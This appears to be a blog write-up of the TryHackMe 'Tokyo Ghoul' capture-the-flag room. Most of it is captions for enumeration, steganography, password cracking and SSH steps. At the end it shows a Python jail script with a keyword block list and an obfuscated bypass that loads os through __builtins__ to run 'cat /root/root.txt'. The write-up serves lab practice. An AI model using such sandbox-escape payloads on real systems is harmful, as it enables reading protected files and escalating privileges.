TryHackMe | Toyko Ghoul

Toyko Ghoul | TryHackMe
nmap scan of all ports
banner scan for os version
FILE: Aogiri_tree.txtWhy are you so late?? i've been waiting for too long .
So i heard you need help to defeat Jason , so i'll help you to do it and i know you are wondering how i will.
I knew Rize San more than anyone and she is a part of you, right?
That mean you got her kagune , so you should activate her Kagune and to do that you should get all control to your body , i'll help you to know Rise san more and get her kagune , and don't forget you are now a part of the Aogiri tree .
Bye Kaneki.
strings need_to_talk
steghide extract
decoded caption
hidden directory
gobuster scan on directory
There is something vulnerable here
LFI maybe?
Error message

… I spent over a day stuck here!

After a few rabbit holes and a lot of for loops I finally figured it out

john and password
ssh to host
sudo -l
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to my world kaneki")
print("What ? You gonna stand like a chicken ? fight me Kaneki")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("Do you think i will let you do this ??????")
print('No Kaneki you are so dead')
if __name__ == "__main__":
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store